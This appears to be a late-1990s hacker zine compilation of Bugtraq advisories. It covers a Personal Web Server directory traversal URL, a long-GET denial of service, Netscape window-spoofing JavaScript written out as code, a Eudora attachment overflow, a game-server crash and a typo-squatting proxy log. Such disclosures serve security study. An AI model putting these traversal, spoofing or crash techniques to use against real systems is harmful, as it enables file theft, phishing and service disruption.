more ripped from bugtraq goodiez, this onez GOOD tho :)
While playing with Microsoft Personal Web Server
(Frontpage-PWS32/3.0.2.926).
I found that the following URL will list the root directory and be able to
download any file you want.
http://www.victim.com/....../
Index of /....../
WINDOWS
My Documents
Program Files
FrontPage Webs
AUTOEXEC.BAT
COMMAND.COM
and so on.......
the bugtraq ripper strikes again!*(^!#(* yay!
Sending...
GET aaaaa[...x4000...]aaaaa HTTP/1.0
[followed by pressing return twice]
to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it
change from "Web Sharing On" to "Web Sharing Off", presumably because the web
server task dies. An annoying DoS, possibly worse, who knows (depends if
they compiled with range checking on, what language they used, etc).
-David.
Netscape Communicator window spoofing bug
There is a bug in Netscape Communicator 3.04,4.06,4.5 Win95 and 4.08
WinNT, which allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. It needs Javascript enabled.
Workaround: Disable Javascript
Demonstration is available at:
http://www.nat.bg/~joro/b14.html
http://www.whitehats.com/guninski/b14.html
This bug is different from the "frame spoofing vulnerability"
The code is:
-------------------------------
function doit()
{
a.document.open();
a.document.write("
");
a.document.close();
}
function winopen() {
a=window.open("view-source:javascript:location='http://www.yahoo.com';");
setTimeout('doit()',30000);
}
Follow this link to go to www.yahoo.com (or somewhere else)
-------------------------------
Note: My web page has moved. Look below for the new URLs.
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
Eudora Attachment Buffer Overflow
I have found another problem with Eudora, attachments, and long filenames that
is similar to the the problem I found last year.
If two messages are sent to an Eudora 4.1 user that have an attachment with a
filename of around 231 or more, the next time the user checkes his mail Eudora
crashes. I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters +
231 = 262 = longer then Windows can handle.
Eudora trucates the long filename correctly and thats why you cant't send just
one messages with a long name, like you use to be able to do with Eudora 4.0.
But it truncates it so the the path length is 259 characters which is the
maximum. Then when it receives the second attachment it truncates, and trys to
add a 1 to the end, this is where it crashes. This allows you to modify the
return address to point to arbitrary code.
Here is how i tested:
Send message to myself with attchment that has a long filename
Resend exact message
Check my mail
Eudora crashes
Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are
affected.
The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99.
Rainbow Six Buffer Overflow.....
Brian Gemberling (camaro@ex-pressnet.com)
Thu, 11 Feb 1999 17:37:43 -0500
* Messages sorted by: [ date ][ thread ][ subject ][ author ]
* Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new
wu-ftpd packages available"
* Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon"
Rainbow Six Multiplayer can be crashed with a buffer overflow just like quake2...
If someone makes the Nick something like...
R700@#!@#@!KRDKJRKDJRKJELJAKRLEALJRHKJEHREKHLARNMBE$MNB#L$K#H$&YUFHOPSUYD)**ASD*&S&A*)(E&(*&@#*(&@(*J#@JKH#...
you get the idea...Boom goes mr. server.
Just thought I'd pass it on..
* Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new
wu-ftpd packages available"
* Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon"
Spoofed Yahoo web site - www.yaho.co.uk
Paul Murphy (Paul.Murphy@GEMINI-RESEARCH.CO.UK)
Mon, 8 Feb 1999 19:14:27 +0000
* Messages sorted by: [ date ][ thread ][ subject ][ author ]
* Next message: Michael: "FakeBo 0.3.1 & nmap"
* Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be
relied upon for conclusive"
* Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site -
www.yaho.co.uk"
This is a MIME message. If you are reading this text, you may want to
consider changing to a mail reader or gateway that understands how to
properly handle MIME multipart messages.
--=_5A0DDE8C.57365AD0
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Hi,
You might like to try this one on for size, and advise whether there's
anything nasty going on behind this site.....
One of our users mistyped the URL of the Yahoo portal site in the UK,
and instead of the normal site, he got a graphic saying "Oops - looks
like a typo". After a few seconds, he found the normal Yahoo site, and
assumed all was well.
All of our Internet access is forced through a local proxy server, and
our logs are scanned for anything naughty, so I was surprised to
discover the attached log entries, which after verification, I can show
is the correct result when accessing "www.yaho.co.uk".
It appears that this does a silent redirect to the correct site, but
with a lot of funny stuff going on in the meantime, some of it on what
appear to be proxy server ports.
The obvious concern is that users will not notice the redirect, use the
search to go to Amazon or some other online shop, enter their credit
card details with the standard 40 bit encryption, and feel safe.
Meanwhile, someone else also has the whole session, does a brute force
attack against the session key, and within hours has the credit card
details....
Am I just being paranoid, or is this for real? The access to
"www.nutzwerk.de"
at 18:16:37 in particular seems significant, since this would be a nice
way to track who is being led astray, and how successful your ploy had
been....
Paul.
-----------------------------------------------------------------------------
Paul Murphy - Head of I.T., Gemini Research Ltd
162 Science Park, Cambridge CB4 4GH
Tel. 01223 435305 Fax. 01223 435301
http://www.gemini-research.co.uk/
--=_5A0DDE8C.57365AD0
Content-Type: application/octet-stream; name="yahoo.log"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="yahoo.log"
c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoxNiAr
MDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG8uY28udWsvIEhUVFAvMS4wIiAyMDAgNjA0DQpzdXBw
b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjE5ICswMDAw
XSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2RhcnQuZ2lmIEhUVFAvMS4w
IiAyMDAgMjY2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
OjE4OjE2OjE5ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2dy
YXlkb3QuZ2lmIEhUVFAvMS4wIiAyMDAgODYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVr
IC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MjIgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vy
ay5kZS90eXBvLmh0bWwgSFRUUC8xLjAiIDIwMCAxODMyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjIzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
eGFob28uY29tL29vb3BzMi5naWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1y
ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjI4ICswMDAwXSAiR0VUIGh0dHA6
Ly93d3cudHliby5uZXQvbG9hZHdhcnMuaHRtbCBIVFRQLzEuMCIgMjAwIDQyNQ0Kc3VwcG9ydC5n
ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoyOSArMDAwMF0gIkdF
VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXJ3YXJzLmpzIEhUVFAvMS4wIiAyMDAgNTc2NQ0Kc3Vw
cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozMCArMDAw
MF0gIkdFVCBodHRwOi8vd3d3LnR5Ym8ubmV0L2Vncm91cHMuaHRtbCBIVFRQLzEuMCIgMjAwIDE4
NjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6
MzAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vZGlzbmV5Lmh0bWwgSFRUUC8x
LjAiIDIwMCAyMTE0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
OTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL2dhbWVzdGFy
dC5odG0gSFRUUC8xLjAiIDIwMCAzNTAyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
IC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXgu
Y29tL2hvbWUuaHRtIEhUVFAvMS4wIiAyMDAgOTY3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cudHli
by5uZXQvYmxhbmsuaHRtbCBIVFRQLzEuMCIgMjAwIDExMQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRwOi8vd3d3
LmxvdHRvc2V4LmNvbS9ob21lLmpzIEhUVFAvMS4wIiAyMDAgMzkzNw0Kc3VwcG9ydC5nZW1pbmkt
cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRw
Oi8vd3d3LmxvdHRvc2V4LmNvbS9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDQzMjANCnN1cHBv
cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYgKzAwMDBd
ICJHRVQgaHR0cDovL3d3dy50eWJvLm5ldC9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDM0NjgN
CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYg
KzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vbnN0YXR1cy5qcyBIVFRQLzEuMCIg
MjAwIDIwMjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6
MTg6MTY6MzcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vyay5kZS9jZ2ktYmluL25ld2Nv
dW50P251dHp3MzAxJndpZHRoPTUmZm9udD1kaWdpdGFsIEhUVFAvMS4wIiAyMDAgMTg2DQpzdXBw
b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjQxICswMDAw
XSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAwIDQ4NTYNCnN1cHBvcnQu
Z2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6NDEgKzAwMDBdICJH
RVQgaHR0cDovL3d3dy55YWhvby5jby51ay8gSFRUUC8xLjAiIDIwMCAxNDA3Nw0Kc3VwcG9ydC5n
ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NSArMDAwMF0gIkdF
VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3dlbGNvbWUuZ2lmIEhUVFAvMS4wIiAyMDAgNzY4OQ0Kc3Vw
cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NiArMDAw
MF0gIkdFVCBodHRwOi8vd3d3LmxvdHRvc2V4LmNvbS9ibGFuay5odG0gSFRUUC8xLjAiIDIwMCAx
NDkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6
NTcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy55YWhvby5jby51ay9pbWFnZXMvc20uZ2lmIEhUVFAv
MS4wIiAyMDAgMzU3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
OTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWFlLm5ldC90eWJvL29vb3BzMi5n
aWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
WzA4L0ZlYi8xOTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29t
L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1OCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmxvdHRv
c2V4LmNvbS9zdGFydC5odG0gSFRUUC8xLjAiIDIwMCAzOTA3DQpzdXBwb3J0LmdlbWluaS1yZXNl
YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjAxICswMDAwXSAiR0VUIGh0dHA6Ly9h
ZHVsdGFkLmhvdGx5bnh4eC5jb20vaG90YXBpLndzYS9HSUYxOTU1IEhUVFAvMS4wIiAzMDIgMA0K
c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzowNCAr
MDAwMF0gIkdFVCBodHRwOi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2ltYWdlcy9hZF9pbmZvLmdp
ZiBIVFRQLzEuMCIgMjAwIDc5OQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw
OC9GZWIvMTk5OToxODoxNzowNSArMDAwMF0gIkdFVCBodHRwOi8vaW1hZ2UuY2xpY2sybmV0LmNv
bS8/QTAwMDI0MSw2IEhUVFAvMS4wIiAzMDIgMjM4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90
dG9zZXguY29tL2Jhbm5lci9rYXJhLmpwZyBIVFRQLzEuMCIgMjAwIDE3NzkwDQpzdXBwb3J0Lmdl
bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA2ICswMDAwXSAiR0VU
IGh0dHA6Ly93d3cueWFob28uY28udWsvYWR2L2ltYWdlcy95Y2xpY2tfd29yazJfaG1wZ191ay5n
aWYgSFRUUC8xLjAiIDIwMCAzMDY1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
WzA4L0ZlYi8xOTk5OjE4OjE3OjA3ICswMDAwXSAiR0VUIGh0dHA6Ly8yMDkuOTAuMTI4LjU1L2Ns
aWNrMi9hZF9iaW4vY2FtcGFpZ25zL2h0bDJfcG9ydC5naWYgSFRUUC8xLjAiIDIwMCAzNDQwDQpz
dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICsw
MDAwXSAiR0VUIGh0dHA6Ly93d3cuZWFkcy5jb20vYWRzZXJ2ZS9hZHNlcnZlLmRsbC9iYW5uZXI/
R0ExMDM0NywwLDAgSFRUUC8xLjAiIDIwMCA1Njg1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYmFu
bmVyYnJva2Vycy5jb20vY2dpLWJpbi9iYW5uZXIuY2dpP3Byb2ZpbGUxJndvbm5lMTUgSFRUUC8x
LjAiIDIwMCAxMTQ4NA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv
MTk5OToxODoxNzowOSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91
a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAyMDAgNjQ0MA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu
Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzoxNCArMDAwMF0gIkdFVCBodHRwOi8vYWRzZXJ2
ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL3Nob3diYW5uZXI/TjAwMDAwNTQ4MyBIVFRQLzEuMCIg
MjAwIDMyNjYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6
MTg6MTc6MTUgKzAwMDBdICJHRVQgaHR0cDovLzIwNy4xNTEuMTguMTc3L2Jhbm5lcnMvaGxuL2Ns
aWVudHMvcGJhbjNfdjMuZ2lmIEhUVFAvMS4wIiAyMDAgMTQ4MDANCnN1cHBvcnQuZ2VtaW5pLXJl
c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkgKzAwMDBdICJHRVQgaHR0cDov
L3d3dy5sb3R0b3NleC5jb20vYmFubmVyL21hY2hpbmUuZ2lmIEhUVFAvMS4wIiAyMDAgMTczNzIN
CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkg
KzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0b3NleC5jb20vSExOYnV0dG9uLmdpZiBIVFRQLzEu
MCIgMjAwIDEzMTQwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
OTk5OjE4OjE3OjMwICswMDAwXSAiR0VUIGh0dHA6Ly93aXAuZG91YmxlY2xpY2submV0L3ZpZXdh
ZC8zMjg0LVNsaWRlcjEyNXgxMjVfU3BlZWRfQW5uLmdpZiBIVFRQLzEuMCIgNTAwIDgzNg0Kc3Vw
cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozMCArMDAw
MF0gIkdFVCBodHRwOi8vd2lwLmRvdWJsZWNsaWNrLm5ldC92aWV3YWQvMjcxMDQtMTIweDYwU2hv
cFByb21vNC5HSUYgSFRUUC8xLjAiIDUwMCA4MjQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNv
LnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzQgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0
b3NleC5jb20vc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNl
YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6Ly93
d3cudHliby5uZXQvc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1y
ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6
Ly93d3cubG90dG9zZXguY29tL2hvbWUuanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWlu
aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0
dHA6Ly93d3cudHliby5uZXQvZG93bmxvYWQuaHRtbCBIVFRQLzEuMCIgMjAwIDE2MDMNCnN1cHBv
cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBd
ICJHRVQgaHR0cDovL3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJv
ZmlsZTEmd29ubmUxNSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
bG90dG9zZXguY29tL2JsYW5rLmh0bSBIVFRQLzEuMCIgMzA0IC0NCnN1cHBvcnQuZ2VtaW5pLXJl
c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBdICJHRVQgaHR0cDov
L3d3dy5sb3R0b3NleC5jb20vc3RhcnQuaHRtIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1p
bmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdFVCBo
dHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5n
ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdF
VCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0by5odG1sIEhUVFAvMS4wIiAyMDAgNDYwDQpz
dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICsw
MDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAz
MDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODox
NzozNyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0b25hdi5qcyBIVFRQ
LzEuMCIgMjAwIDQ0MDMNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmVi
LzE5OTk6MTg6MTc6MzggKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vY2dpLWJp
bi9zZXJ2ZS5jZ2k/SUQ9TnV0endlcmsgSFRUUC8xLjAiIDIwMCAyMjAwDQpzdXBwb3J0LmdlbWlu
aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM4ICswMDAwXSAiUE9TVCBo
dHRwOi8vYWRzZXJ2ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL2dvYmFubmVyP04wMDAwMDU0ODMg
SFRUUC8xLjAiIDMwMiAxOTcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv
RmViLzE5OTk6MTg6MTc6NDAgKzAwMDBdICJHRVQgaHR0cDovL2ltYWdlLmNsaWNrMm5ldC5jb20v
P0EwMDM3ODQsMSBIVFRQLzEuMCIgMzAyIDIzNw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmN5YmVy
dGhyaWxsLmNvbS9jZ2ktYmluL3Nwb25zb3Ivc3RpL3JpY29jaGV0LmNnaT90eXBvPXlhaG9vLmRl
IEhUVFAvMS4wIiAzMDIgMA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
ZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
OjgwODAvaW5kZXguc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDYyNA0Kc3VwcG9ydC5nZW1pbmkt
cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRw
Oi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2NnaS1iaW4vYmFubmVyLmNnaT9wcm9maWxlMSZ3b25u
ZTE1IEhUVFAvMS4wIiAyMDAgMTE0ODQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
LSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
YXN5LmNvbTo4MDgwL2N1cnRhaW4uc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDE4OTUNCnN1cHBv
cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBd
ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL21haW4uc2h0bWw/VjgwMCBI
VFRQLzEuMCIgMjAwIDIwODcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv
RmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovLzIwOS45MC4xMjguNTUvY2xpY2sy
L2FkX2Jpbi9jYW1wYWlnbnMvYzYtMzE2cC0uZ2lmIEhUVFAvMS4wIiAyMDAgMTEyNTENCnN1cHBv
cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDYgKzAwMDBd
ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9nZXJtYW4uZ2lmIEhU
VFAvMS4wIiAyMDAgMTA0Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
ZWIvMTk5OToxODoxNzo0NiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
OjgwODAvaW1nL2VuZ2xpc2guZ2lmIEhUVFAvMS4wIiAyMDAgMTM3NA0Kc3VwcG9ydC5nZW1pbmkt
cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NyArMDAwMF0gIkdFVCBodHRw
Oi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2tvcmVhbi5naWYgSFRUUC8xLjAiIDIw
MCAxNDc2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4
OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29tL2NnaS1iaW4vY2xpY2su
Y2dpP0lEPU51dHp3ZXJrIEhUVFAvMS4wIiAzMDIgMjc1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
Q2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvY3VydGFpbi5naWYgSFRUUC8xLjAiIDIwMCA0Mjc1
DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjQ5
ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvZnJlbmNo
LmdpZiBIVFRQLzEuMCIgMjAwIDEwNjgNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
LSBbMDgvRmViLzE5OTk6MTg6MTc6NTAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
YXN5LmNvbTo4MDgwL2ltZy9qYXBhbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMDY2DQpzdXBwb3J0
LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjUwICswMDAwXSAi
R0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9pbWcvc3BhbmlzaC5naWYgSFRU
UC8xLjAiIDIwMCAxMDExDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0Zl
Yi8xOTk5OjE4OjE3OjUyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206
ODA4MC9pbWcva29ydGV4dC5naWYgSFRUUC8xLjAiIDIwMCA4OTcNCnN1cHBvcnQuZ2VtaW5pLXJl
c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTMgKzAwMDBdICJHRVQgaHR0cDov
L3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJvZmlsZTEmd29ubmUx
NSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
WzA4L0ZlYi8xOTk5OjE4OjE3OjUzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFz
eS5jb206ODA4MC9pbWcvY2hpbmVzZS5naWYgSFRUUC8xLjAiIDIwMCAxMTc1DQpzdXBwb3J0Lmdl
bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU0ICswMDAwXSAiR0VU
